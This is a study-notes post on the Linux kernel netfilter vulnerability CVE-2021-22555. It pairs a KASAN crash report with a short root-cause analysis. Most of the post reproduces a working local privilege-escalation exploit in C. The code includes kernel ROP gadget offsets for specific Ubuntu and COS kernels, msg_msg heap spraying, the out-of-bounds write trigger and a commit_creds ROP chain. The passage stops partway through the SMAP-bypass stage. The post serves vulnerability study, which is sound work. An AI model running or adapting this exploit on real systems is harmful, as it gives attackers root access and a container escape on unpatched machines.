[Original] Kernel vulnerability study notes (CVE-2021-22555)
2024-6-6 11:05

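Preface

The Kanxue binary security course has ended. This post is my assessment submission, and it also serves as a check on how well I understood the course material.

References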

https://www.anquanke.com/post/id/254027

https://arttnba3.cn/2022/04/01/CVE-0X07-CVE-2021-22555/

https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html

and the Kanxue binary security course.

Vulnerability analysis

Let's first look at the report KASAN produces:

[ 1185.205439] ==================================================================
[ 1185.205993] BUG: KASAN: slab-out-of-bounds in xt_compat_target_from_user+0x20a/0x4c0 [x_tables]
[ 1185.206102] Write of size 4 at addr ffff8881e4c97600 by task poc/2059
 
[ 1185.206255] CPU: 1 PID: 2059 Comm: poc Not tainted 5.8.1 #1
[ 1185.206257] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
[ 1185.206259] Call Trace:
[ 1185.206326]  dump_stack+0x9d/0xda
[ 1185.206346]  print_address_description.constprop.0+0x1f/0x210
[ 1185.206353]  ? _raw_spin_lock_irqsave+0x8e/0xf0
[ 1185.206355]  ? _raw_spin_trylock_bh+0x130/0x130
[ 1185.206371]  ? xt_compat_target_from_user+0x20a/0x4c0 [x_tables]
[ 1185.206373]  kasan_report.cold+0x37/0x7c
[ 1185.206377]  ? xt_compat_target_from_user+0x20a/0x4c0 [x_tables]
[ 1185.206390]  check_memory_region+0x15b/0x1e0
[ 1185.206393]  memset+0x24/0x50
[ 1185.206399]  xt_compat_target_from_user+0x20a/0x4c0 [x_tables]
[ 1185.206406]  ? xt_compat_match_from_user+0x4c0/0x4c0 [x_tables]
[ 1185.206410]  ? __kmalloc_node+0x127/0x380
[ 1185.206416]  translate_compat_table+0xf00/0x16d0 [ip6_tables]
[ 1185.206420]  ? ip6t_register_table+0x2d0/0x2d0 [ip6_tables]
[ 1185.206423]  ? kasan_unpoison_shadow+0x38/0x50
[ 1185.206425]  ? __kasan_kmalloc.constprop.0+0xcf/0xe0
[ 1185.206427]  ? kasan_kmalloc+0x9/0x10
[ 1185.206428]  ? __kmalloc_node+0x127/0x380
[ 1185.206431]  ? __kasan_check_write+0x14/0x20
[ 1185.206433]  compat_do_replace.isra.0+0x160/0x380 [ip6_tables]
[ 1185.206435]  ? __kasan_check_write+0x14/0x20
[ 1185.206438]  ? translate_compat_table+0x16d0/0x16d0 [ip6_tables]
[ 1185.206453]  ? apparmor_task_alloc+0x2f0/0x2f0
[ 1185.206465]  ? is_bpf_text_address+0xe/0x20
[ 1185.206478]  ? ns_capable_common+0x5c/0xe0
[ 1185.206481]  compat_do_ip6t_set_ctl+0xe4/0x130 [ip6_tables]
[ 1185.206496]  compat_nf_setsockopt+0x74/0x100
[ 1185.206503]  compat_ipv6_setsockopt.part.0+0x582/0x780
[ 1185.206505]  ? ipv6_setsockopt+0x110/0x110
[ 1185.206507]  ? save_stack+0x42/0x50
[ 1185.206509]  ? save_stack+0x23/0x50
[ 1185.206511]  ? __kasan_kmalloc.constprop.0+0xcf/0xe0
[ 1185.206513]  ? kasan_slab_alloc+0xe/0x10
[ 1185.206514]  ? kmem_cache_alloc+0xd7/0x250
[ 1185.206521]  ? security_file_alloc+0x2f/0x130
[ 1185.206525]  ? __alloc_file+0xb1/0x370
[ 1185.206526]  ? alloc_empty_file+0x46/0xf0
[ 1185.206529]  ? alloc_file+0x59/0x500
[ 1185.206530]  ? alloc_file_pseudo+0x17e/0x270
[ 1185.206535]  ? sock_alloc_file+0x47/0x170
[ 1185.206537]  ? __sys_socket+0x108/0x1d0
[ 1185.206541]  ? __do_compat_sys_socketcall+0x51c/0x5e0
[ 1185.206543]  ? __ia32_compat_sys_socketcall+0x53/0x70
[ 1185.206549]  ? do_syscall_32_irqs_on+0x4a/0x70
[ 1185.206552]  ? do_fast_syscall_32+0x5f/0xd0
[ 1185.206554]  ? do_SYSENTER_32+0x1f/0x30
[ 1185.206558]  ? entry_SYSENTER_compat_after_hwframe+0x4d/0x5f
[ 1185.206560]  ? __ia32_compat_sys_socketcall+0x53/0x70
[ 1185.206561]  ? do_syscall_32_irqs_on+0x4a/0x70
[ 1185.206563]  ? do_fast_syscall_32+0x5f/0xd0
[ 1185.206565]  ? do_SYSENTER_32+0x1f/0x30
[ 1185.206567]  ? entry_SYSENTER_compat_after_hwframe+0x4d/0x5f
[ 1185.206569]  ? __ia32_compat_sys_socketcall+0x53/0x70
[ 1185.206571]  ? do_syscall_32_irqs_on+0x4a/0x70
[ 1185.206573]  ? do_fast_syscall_32+0x5f/0xd0
[ 1185.206575]  ? do_SYSENTER_32+0x1f/0x30
[ 1185.206577]  ? entry_SYSENTER_compat_after_hwframe+0x4d/0x5f
[ 1185.206579]  ? __sys_socket+0xdd/0x1d0
[ 1185.206581]  ? __do_compat_sys_socketcall+0x51c/0x5e0
[ 1185.206583]  ? __ia32_compat_sys_socketcall+0x53/0x70
[ 1185.206585]  ? do_syscall_32_irqs_on+0x4a/0x70
[ 1185.206587]  ? do_fast_syscall_32+0x5f/0xd0
[ 1185.206588]  ? do_SYSENTER_32+0x1f/0x30
[ 1185.206590]  ? entry_SYSENTER_compat_after_hwframe+0x4d/0x5f
[ 1185.206595]  ? __mod_lruvec_state+0x8c/0x320
[ 1185.206598]  ? alloc_pages_current+0xdc/0x1c0
[ 1185.206600]  ? kasan_init_slab_obj+0x25/0x30
[ 1185.206603]  ? setup_object.isra.0+0x2b/0xa0
[ 1185.206605]  ? __kasan_check_write+0x14/0x20
[ 1185.206607]  ? apparmor_file_alloc_security+0x178/0x5c0
[ 1185.206609]  ? kasan_unpoison_shadow+0x38/0x50
[ 1185.206611]  ? apparmor_ptrace_access_check+0x460/0x460
[ 1185.206613]  ? security_file_alloc+0x2f/0x130
[ 1185.206614]  ? kmem_cache_alloc+0x180/0x250
[ 1185.206617]  ? __kasan_check_write+0x14/0x20
[ 1185.206619]  ? __mutex_init+0xba/0x130
[ 1185.206621]  ? __alloc_file+0x1a5/0x370
[ 1185.206623]  ? alloc_empty_file+0x92/0xf0
[ 1185.206625]  ? alloc_file+0x228/0x500
[ 1185.206629]  ? _cond_resched+0x19/0x30
[ 1185.206632]  ? aa_sk_perm+0x12a/0x610
[ 1185.206634]  compat_ipv6_setsockopt+0xb4/0x160
[ 1185.206640]  ? __fget_files+0x12b/0x250
[ 1185.206647]  inet_csk_compat_setsockopt+0x6b/0x120
[ 1185.206650]  compat_tcp_setsockopt+0x1c/0x30
[ 1185.206653]  compat_sock_common_setsockopt+0x8a/0x160
[ 1185.206655]  __compat_sys_setsockopt+0x139/0x330
[ 1185.206658]  ? __sys_socket+0x11b/0x1d0
[ 1185.206660]  ? __x32_compat_sys_recvmmsg_time32+0x150/0x150
[ 1185.206662]  ? __kasan_check_write+0x14/0x20
[ 1185.206664]  __do_compat_sys_socketcall+0x48c/0x5e0
[ 1185.206667]  ? __x32_compat_sys_setsockopt+0x150/0x150
[ 1185.206673]  ? perf_event_namespaces+0x1a/0x30
[ 1185.206677]  ? walk_process_tree+0x330/0x330
[ 1185.206679]  ? __kasan_check_read+0x11/0x20
[ 1185.206684]  ? fpregs_assert_state_consistent+0x22/0xa0
[ 1185.206686]  ? __prepare_exit_to_usermode+0x76/0x210
[ 1185.206688]  ? fpregs_assert_state_consistent+0x22/0xa0
[ 1185.206690]  __ia32_compat_sys_socketcall+0x53/0x70
[ 1185.206693]  do_syscall_32_irqs_on+0x4a/0x70
[ 1185.206696]  do_fast_syscall_32+0x5f/0xd0
[ 1185.206698]  do_SYSENTER_32+0x1f/0x30
[ 1185.206700]  entry_SYSENTER_compat_after_hwframe+0x4d/0x5f
[ 1185.206705] RIP: 0023:0xf7f08569
[ 1185.206711] Code: c4 01 10 03 03 74 c0 01 10 05 03 74 b8 01 10 06 03 74 b4 01 10 07 03 74 b0 01 10 08 03 74 d8 01 00 51 52 55 89 e5 0f 34 cd 80 <5d> 5a 59 c3 90 90 90 90 8d b4 26 00 00 00 00 8d b4 26 00 00 00 00
[ 1185.206712] RSP: 002b:00000000ffed1440 EFLAGS: 00000246 ORIG_RAX: 0000000000000066
[ 1185.206715] RAX: ffffffffffffffda RBX: 000000000000000e RCX: 00000000ffed1458
[ 1185.206716] RDX: 00000000ffed14bc RSI: 00000000f7ef5000 RDI: 00000000ffed16cc
[ 1185.206717] RBP: 00000000ffed16e8 R08: 0000000000000000 R09: 0000000000000000
[ 1185.206718] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000
[ 1185.206719] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
 
[ 1185.206746] Allocated by task 2059:
[ 1185.206836]  save_stack+0x23/0x50
[ 1185.206838]  __kasan_kmalloc.constprop.0+0xcf/0xe0
[ 1185.206840]  kasan_kmalloc+0x9/0x10
[ 1185.206842]  __kmalloc_node+0x127/0x380
[ 1185.206845]  kvmalloc_node+0x7b/0x90
[ 1185.206855]  xt_alloc_table_info+0x2f/0x80 [x_tables]
[ 1185.206860]  translate_compat_table+0xb38/0x16d0 [ip6_tables]
[ 1185.206862]  compat_do_replace.isra.0+0x160/0x380 [ip6_tables]
[ 1185.206865]  compat_do_ip6t_set_ctl+0xe4/0x130 [ip6_tables]
[ 1185.206868]  compat_nf_setsockopt+0x74/0x100
[ 1185.206871]  compat_ipv6_setsockopt.part.0+0x582/0x780
[ 1185.206873]  compat_ipv6_setsockopt+0xb4/0x160
[ 1185.206875]  inet_csk_compat_setsockopt+0x6b/0x120
[ 1185.206877]  compat_tcp_setsockopt+0x1c/0x30
[ 1185.206879]  compat_sock_common_setsockopt+0x8a/0x160
[ 1185.206882]  __compat_sys_setsockopt+0x139/0x330
[ 1185.206884]  __do_compat_sys_socketcall+0x48c/0x5e0
[ 1185.206886]  __ia32_compat_sys_socketcall+0x53/0x70
[ 1185.206889]  do_syscall_32_irqs_on+0x4a/0x70
[ 1185.206892]  do_fast_syscall_32+0x5f/0xd0
[ 1185.206894]  do_SYSENTER_32+0x1f/0x30
[ 1185.206896]  entry_SYSENTER_compat_after_hwframe+0x4d/0x5f
 
[ 1185.206976] Freed by task 0:
[ 1185.206998] (stack is not available)
 
[ 1185.207036] The buggy address belongs to the object at ffff8881e4c97400
                which belongs to the cache kmalloc-512(1052:session-1.scope) of size 512
[ 1185.207140] The buggy address is located 0 bytes to the right of
                512-byte region [ffff8881e4c97400, ffff8881e4c97600)
[ 1185.207317] The buggy address belongs to the page:
[ 1185.207382] page:ffffea0007932400 refcount:1 mapcount:0 mapping:0000000000000000 index:0xffff8881e4c96400 head:ffffea0007932400 order:3 compound_mapcount:0 compound_pincount:0
[ 1185.207384] flags: 0x17ffffc0010200(slab|head)
[ 1185.207387] raw: 0017ffffc0010200 dead000000000100 dead000000000122 ffff8881cab0b400
[ 1185.207389] raw: ffff8881e4c96400 0000000080200016 00000001ffffffff 0000000000000000
[ 1185.207390] page dumped because: kasan: bad access detected
 
[ 1185.207402] Memory state around the buggy address:
[ 1185.207459]  ffff8881e4c97500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 1185.207507]  ffff8881e4c97580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 1185.207549] >ffff8881e4c97600: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 1185.207605]                    ^
[ 1185.207628]  ffff8881e4c97680: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 1185.207732]  ffff8881e4c97700: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 1185.207780] ==================================================================
[ 1185.207882] Disabling lock debugging due to kernel taint
[ 1185.209449] x_tables: ip6_tables: icmp6.0 match: invalid size 8 (kernel) != (user) 212

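Judging from the report, xt_compat_target_from_user performs a heap out-of-bounds write: its memset writes just past the end of a kmalloc-512 object. KASAN records this access as a 4-byte write, while the exploit below is laid out so that 2 zero bytes spill into the adjacent object.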

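Since I am not very familiar with the Linux kernel, I can only start from the exploit and work backwards to the root cause of the vulnerability and the general purpose of the module it lives in.

The PoC is as follows: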

// exp.c
#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <linux/netfilter_ipv4/ip_tables.h>
// clang-format on
 
#define PAGE_SIZE 0x1000
#define PRIMARY_SIZE 0x1000
#define SECONDARY_SIZE 0x400
 
#define NUM_SOCKETS 4
#define NUM_SKBUFFS 128
#define NUM_PIPEFDS 256
#define NUM_MSQIDS 4096
 
#define HOLE_STEP 1024
 
#define MTYPE_PRIMARY 0x41
#define MTYPE_SECONDARY 0x42
#define MTYPE_FAKE 0x1337
 
#define MSG_TAG 0xAAAAAAAA
 
// #define KERNEL_COS_5_4_89 1
#define KERNEL_UBUNTU_5_8_0_48 1
 
// clang-format off
#ifdef KERNEL_COS_5_4_89
// 0xffffffff810360f8 : push rax ; jmp qword ptr [rcx]
#define PUSH_RAX_JMP_QWORD_PTR_RCX 0x360F8
// 0xffffffff815401df : pop rsp ; pop rbx ; ret
#define POP_RSP_POP_RBX_RET 0x5401DF
 
// 0xffffffff816d3a65 : enter 0, 0 ; pop rbx ; pop r14 ; pop rbp ; ret
#define ENTER_0_0_POP_RBX_POP_R14_POP_RBP_RET 0x6D3A65
// 0xffffffff814ddfa8 : mov qword ptr [r14], rbx ; pop rbx ; pop r14 ; pop rbp ; ret
#define MOV_QWORD_PTR_R14_RBX_POP_RBX_POP_R14_POP_RBP_RET 0x4DDFA8
// 0xffffffff81073972 : push qword ptr [rbp + 0x25] ; pop rbp ; ret
#define PUSH_QWORD_PTR_RBP_25_POP_RBP_RET 0x73972
// 0xffffffff8106748c : mov rsp, rbp ; pop rbp ; ret
#define MOV_RSP_RBP_POP_RBP_RET 0x6748C
 
// 0xffffffff810c7c80 : pop rdx ; ret
#define POP_RDX_RET 0xC7C80
// 0xffffffff8143a2b4 : pop rsi ; ret
#define POP_RSI_RET 0x43A2B4
// 0xffffffff81067520 : pop rdi ; ret
#define POP_RDI_RET 0x67520
// 0xffffffff8100054b : pop rbp ; ret
#define POP_RBP_RET 0x54B
 
// 0xffffffff812383a6 : mov rdi, rax ; jne 0xffffffff81238396 ; pop rbp ; ret
#define MOV_RDI_RAX_JNE_POP_RBP_RET 0x2383A6
// 0xffffffff815282e1 : cmp rdx, 1 ; jne 0xffffffff8152831d ; pop rbp ; ret
#define CMP_RDX_1_JNE_POP_RBP_RET 0x5282E1
 
#define FIND_TASK_BY_VPID 0x963C0
#define SWITCH_TASK_NAMESPACES 0x9D080
#define COMMIT_CREDS 0x9EC10
#define PREPARE_KERNEL_CRED 0x9F1F0
 
#define ANON_PIPE_BUF_OPS 0xE51600
#define INIT_NSPROXY 0x1250590
#elif KERNEL_UBUNTU_5_8_0_48
// 0xffffffff816e9783 : push rsi ; jmp qword ptr [rsi + 0x39]
#define PUSH_RSI_JMP_QWORD_PTR_RSI_39 0x6E9783
// 0xffffffff8109b6c0 : pop rsp ; ret
#define POP_RSP_RET 0x9B6C0
// 0xffffffff8106db59 : add rsp, 0xd0 ; ret
#define ADD_RSP_D0_RET 0x6DB59
 
// 0xffffffff811a21c3 : enter 0, 0 ; pop rbx ; pop r12 ; pop rbp ; ret
#define ENTER_0_0_POP_RBX_POP_R12_POP_RBP_RET 0x1A21C3
// 0xffffffff81084de3 : mov qword ptr [r12], rbx ; pop rbx ; pop r12 ; pop rbp ; ret
#define MOV_QWORD_PTR_R12_RBX_POP_RBX_POP_R12_POP_RBP_RET 0x84DE3
// 0xffffffff816a98ff : push qword ptr [rbp + 0xa] ; pop rbp ; ret
#define PUSH_QWORD_PTR_RBP_A_POP_RBP_RET 0x6A98FF
// 0xffffffff810891bc : mov rsp, rbp ; pop rbp ; ret
#define MOV_RSP_RBP_POP_RBP_RET 0x891BC
 
// 0xffffffff810f5633 : pop rcx ; ret
#define POP_RCX_RET 0xF5633
// 0xffffffff811abaae : pop rsi ; ret
#define POP_RSI_RET 0x1ABAAE
// 0xffffffff81089250 : pop rdi ; ret
#define POP_RDI_RET 0x89250
// 0xffffffff810005ae : pop rbp ; ret
#define POP_RBP_RET 0x5AE
 
// 0xffffffff81557894 : mov rdi, rax ; jne 0xffffffff81557888 ; xor eax, eax ; ret
#define MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET 0x557894
// 0xffffffff810724db : cmp rcx, 4 ; jne 0xffffffff810724c0 ; pop rbp ; ret
#define CMP_RCX_4_JNE_POP_RBP_RET 0x724DB
 
#define FIND_TASK_BY_VPID 0xBFBC0
#define SWITCH_TASK_NAMESPACES 0xC7A50
#define COMMIT_CREDS 0xC8C80
#define PREPARE_KERNEL_CRED 0xC9110
 
#define ANON_PIPE_BUF_OPS 0x1078380
#define INIT_NSPROXY 0x1663080
#else
#error "No kernel version defined"
#endif
// clang-format on
 
#define SKB_SHARED_INFO_SIZE 0x140
#define MSG_MSG_SIZE (sizeof(struct msg_msg))
#define MSG_MSGSEG_SIZE (sizeof(struct msg_msgseg))
 
struct msg_msg {
  uint64_t m_list_next;
  uint64_t m_list_prev;
  uint64_t m_type;
  uint64_t m_ts;
  uint64_t next;
  uint64_t security;
};
 
struct msg_msgseg {
  uint64_t next;
};
 
struct pipe_buffer {
  uint64_t page;
  uint32_t offset;
  uint32_t len;
  uint64_t ops;
  uint32_t flags;
  uint32_t pad;
  uint64_t private;
};
 
struct pipe_buf_operations {
  uint64_t confirm;
  uint64_t release;
  uint64_t steal;
  uint64_t get;
};
 
struct {
  long mtype;
  char mtext[PRIMARY_SIZE - MSG_MSG_SIZE];
} msg_primary;
 
struct {
  long mtype;
  char mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
} msg_secondary;
 
struct {
  long mtype;
  char mtext[PAGE_SIZE - MSG_MSG_SIZE + PAGE_SIZE - MSG_MSGSEG_SIZE];
} msg_fake;
 
void build_msg_msg(struct msg_msg *msg, uint64_t m_list_next,
                   uint64_t m_list_prev, uint64_t m_ts, uint64_t next) {
  msg->m_list_next = m_list_next;
  msg->m_list_prev = m_list_prev;
  msg->m_type = MTYPE_FAKE;
  msg->m_ts = m_ts;
  msg->next = next;
  msg->security = 0;
}
 
int write_msg(int msqid, const void *msgp, size_t msgsz, long msgtyp) {
  *(long *)msgp = msgtyp;
  if (msgsnd(msqid, msgp, msgsz - sizeof(long), 0) < 0) {
    perror("[-] msgsnd");
    return -1;
  }
  return 0;
}
 
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
  if (msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, MSG_COPY | IPC_NOWAIT) <
      0) {
    perror("[-] msgrcv");
    return -1;
  }
  return 0;
}
 
int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
  if (msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, 0) < 0) {
    perror("[-] msgrcv");
    return -1;
  }
  return 0;
}
 
int spray_skbuff(int ss[NUM_SOCKETS][2], const void *buf, size_t size) {
  for (int i = 0; i < NUM_SOCKETS; i++) {
    for (int j = 0; j < NUM_SKBUFFS; j++) {
      if (write(ss[i][0], buf, size) < 0) {
        perror("[-] write");
        return -1;
      }
    }
  }
  return 0;
}
 
int free_skbuff(int ss[NUM_SOCKETS][2], void *buf, size_t size) {
  for (int i = 0; i < NUM_SOCKETS; i++) {
    for (int j = 0; j < NUM_SKBUFFS; j++) {
      if (read(ss[i][1], buf, size) < 0) {
        perror("[-] read");
        return -1;
      }
    }
  }
  return 0;
}
 
int trigger_oob_write(int s) {
  struct __attribute__((__packed__)) {
    struct ipt_replace replace;
    struct ipt_entry entry;
    struct xt_entry_match match;
    char pad[0x108 + PRIMARY_SIZE - 0x200 - 0x2];
    struct xt_entry_target target;
  } data = {0};
 
  data.replace.num_counters = 1;
  data.replace.num_entries = 1;
  data.replace.size = (sizeof(data.entry) + sizeof(data.match) +
                       sizeof(data.pad) + sizeof(data.target));
 
  data.entry.next_offset = (sizeof(data.entry) + sizeof(data.match) +
                            sizeof(data.pad) + sizeof(data.target));
  data.entry.target_offset =
      (sizeof(data.entry) + sizeof(data.match) + sizeof(data.pad));
 
  data.match.u.user.match_size = (sizeof(data.match) + sizeof(data.pad));
  strcpy(data.match.u.user.name, "icmp");
  data.match.u.user.revision = 0;
 
  data.target.u.user.target_size = sizeof(data.target);
  strcpy(data.target.u.user.name, "NFQUEUE");
  data.target.u.user.revision = 1;
 
  // Partially overwrite the adjacent buffer with 2 bytes of zero.
  if (setsockopt(s, SOL_IP, IPT_SO_SET_REPLACE, &data, sizeof(data)) != 0) {
    if (errno == ENOPROTOOPT) {
      printf("[-] Error ip_tables module is not loaded.\n");
      return -1;
    }
  }
 
  return 0;
}
 
// Note: Must not touch offset 0x10-0x18.
void build_krop(char *buf, uint64_t kbase_addr, uint64_t scratchpad_addr) {
  uint64_t *rop;
#ifdef KERNEL_COS_5_4_89
  *(uint64_t *)&buf[0x00] = kbase_addr + POP_RSP_POP_RBX_RET;
 
  rop = (uint64_t *)&buf[0x18];
 
  // Save RBP at scratchpad_addr.
  *rop++ = kbase_addr + ENTER_0_0_POP_RBX_POP_R14_POP_RBP_RET;
  *rop++ = scratchpad_addr; // R14
  *rop++ = 0xDEADBEEF;      // RBP
  *rop++ = kbase_addr + MOV_QWORD_PTR_R14_RBX_POP_RBX_POP_R14_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBX
  *rop++ = 0xDEADBEEF; // R14
  *rop++ = 0xDEADBEEF; // RBP
 
  // commit_creds(prepare_kernel_cred(NULL))
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 0; // RDI
  *rop++ = kbase_addr + PREPARE_KERNEL_CRED;
  *rop++ = kbase_addr + POP_RDX_RET;
  *rop++ = 1; // RDX
  *rop++ = kbase_addr + CMP_RDX_1_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + COMMIT_CREDS;
 
  // switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 1; // RDI
  *rop++ = kbase_addr + FIND_TASK_BY_VPID;
  *rop++ = kbase_addr + POP_RDX_RET;
  *rop++ = 1; // RDX
  *rop++ = kbase_addr + CMP_RDX_1_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + POP_RSI_RET;
  *rop++ = kbase_addr + INIT_NSPROXY; // RSI
  *rop++ = kbase_addr + SWITCH_TASK_NAMESPACES;
 
  // Load RBP from scratchpad_addr and resume execution.
  *rop++ = kbase_addr + POP_RBP_RET;
  *rop++ = scratchpad_addr - 0x25; // RBP
  *rop++ = kbase_addr + PUSH_QWORD_PTR_RBP_25_POP_RBP_RET;
  *rop++ = kbase_addr + MOV_RSP_RBP_POP_RBP_RET;
#elif KERNEL_UBUNTU_5_8_0_48
  *(uint64_t *)&buf[0x39] = kbase_addr + POP_RSP_RET;
  *(uint64_t *)&buf[0x00] = kbase_addr + ADD_RSP_D0_RET;
 
  rop = (uint64_t *)&buf[0xD8];
 
  // Save RBP at scratchpad_addr.
  *rop++ = kbase_addr + ENTER_0_0_POP_RBX_POP_R12_POP_RBP_RET;
  *rop++ = scratchpad_addr; // R12
  *rop++ = 0xDEADBEEF;      // RBP
  *rop++ = kbase_addr + MOV_QWORD_PTR_R12_RBX_POP_RBX_POP_R12_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBX
  *rop++ = 0xDEADBEEF; // R12
  *rop++ = 0xDEADBEEF; // RBP
 
  // commit_creds(prepare_kernel_cred(NULL))
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 0; // RDI
  *rop++ = kbase_addr + PREPARE_KERNEL_CRED;
  *rop++ = kbase_addr + POP_RCX_RET;
  *rop++ = 4; // RCX
  *rop++ = kbase_addr + CMP_RCX_4_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET;
  *rop++ = kbase_addr + COMMIT_CREDS;
 
  // switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 1; // RDI
  *rop++ = kbase_addr + FIND_TASK_BY_VPID;
  *rop++ = kbase_addr + POP_RCX_RET;
  *rop++ = 4; // RCX
  *rop++ = kbase_addr + CMP_RCX_4_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET;
  *rop++ = kbase_addr + POP_RSI_RET;
  *rop++ = kbase_addr + INIT_NSPROXY; // RSI
  *rop++ = kbase_addr + SWITCH_TASK_NAMESPACES;
 
  // Load RBP from scratchpad_addr and resume execution.
  *rop++ = kbase_addr + POP_RBP_RET;
  *rop++ = scratchpad_addr - 0xA; // RBP
  *rop++ = kbase_addr + PUSH_QWORD_PTR_RBP_A_POP_RBP_RET;
  *rop++ = kbase_addr + MOV_RSP_RBP_POP_RBP_RET;
#endif
}
 
int setup_sandbox(void) {
  if (unshare(CLONE_NEWUSER) < 0) {
    perror("[-] unshare(CLONE_NEWUSER)");
    return -1;
  }
  if (unshare(CLONE_NEWNET) < 0) {
    perror("[-] unshare(CLONE_NEWNET)");
    return -1;
  }
 
  cpu_set_t set;
  CPU_ZERO(&set);
  CPU_SET(0, &set);
  if (sched_setaffinity(getpid(), sizeof(set), &set) < 0) {
    perror("[-] sched_setaffinity");
    return -1;
  }
 
  return 0;
}
 
int main(int argc, char *argv[]) {
  int s;
  int fd;
  int ss[NUM_SOCKETS][2];
  int pipefd[NUM_PIPEFDS][2];
  int msqid[NUM_MSQIDS];
 
  char primary_buf[PRIMARY_SIZE - SKB_SHARED_INFO_SIZE];
  char secondary_buf[SECONDARY_SIZE - SKB_SHARED_INFO_SIZE];
 
  struct msg_msg *msg;
  struct pipe_buf_operations *ops;
  struct pipe_buffer *buf;
 
  uint64_t pipe_buffer_ops = 0;
  uint64_t kheap_addr = 0, kbase_addr = 0;
 
  int fake_idx = -1, real_idx = -1;
 
  printf("[+] Linux Privilege Escalation by theflow@ - 2021\n");
 
  printf("\n");
  printf("[+] STAGE 0: Initialization\n");
 
  printf("[*] Setting up namespace sandbox...\n");
  if (setup_sandbox() < 0)
    goto err_no_rmid;
 
  printf("[*] Initializing sockets and message queues...\n");
 
  if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
    perror("[-] socket");
    goto err_no_rmid;
  }
 
  for (int i = 0; i < NUM_SOCKETS; i++) {
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, ss[i]) < 0) {
      perror("[-] socketpair");
      goto err_no_rmid;
    }
  }
 
  for (int i = 0; i < NUM_MSQIDS; i++) {
    if ((msqid[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) {
      perror("[-] msgget");
      goto err_no_rmid;
    }
  }
 
  printf("\n");
  printf("[+] STAGE 1: Memory corruption\n");
 
  printf("[*] Spraying primary messages...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    memset(&msg_primary, 0, sizeof(msg_primary));
    *(int *)&msg_primary.mtext[0] = MSG_TAG;
    *(int *)&msg_primary.mtext[4] = i;
    if (write_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) <
        0)
      goto err_rmid;
  }
 
  printf("[*] Spraying secondary messages...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    memset(&msg_secondary, 0, sizeof(msg_secondary));
    *(int *)&msg_secondary.mtext[0] = MSG_TAG;
    *(int *)&msg_secondary.mtext[4] = i;
    if (write_msg(msqid[i], &msg_secondary, sizeof(msg_secondary),
                  MTYPE_SECONDARY) < 0)
      goto err_rmid;
  }
 
  printf("[*] Creating holes in primary messages...\n");
  for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP) {
    if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) <
        0)
      goto err_rmid;
  }
 
  printf("[*] Triggering out-of-bounds write...\n");
  if (trigger_oob_write(s) < 0)
    goto err_rmid;
 
  printf("[*] Searching for corrupted primary message...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    if (i != 0 && (i % HOLE_STEP) == 0)
      continue;
    if (peek_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), 1) < 0)
      goto err_no_rmid;
    if (*(int *)&msg_secondary.mtext[0] != MSG_TAG) {
      printf("[-] Error could not corrupt any primary message.\n");
      goto err_no_rmid;
    }
    if (*(int *)&msg_secondary.mtext[4] != i) {
      fake_idx = i;
      real_idx = *(int *)&msg_secondary.mtext[4];
      break;
    }
  }
 
  if (fake_idx == -1 && real_idx == -1) {
    printf("[-] Error could not corrupt any primary message.\n");
    goto err_no_rmid;
  }
 
  // fake_idx's primary message has a corrupted next pointer; wrongly
  // pointing to real_idx's secondary message.
  printf("[+] fake_idx: %x\n", fake_idx);
  printf("[+] real_idx: %x\n", real_idx);
 
  printf("\n");
  printf("[+] STAGE 2: SMAP bypass\n");
 
  printf("[*] Freeing real secondary message...\n");
  if (read_msg(msqid[real_idx], &msg_secondary, sizeof(msg_secondary),
               MTYPE_SECONDARY) < 0)
    goto err_rmid;
 
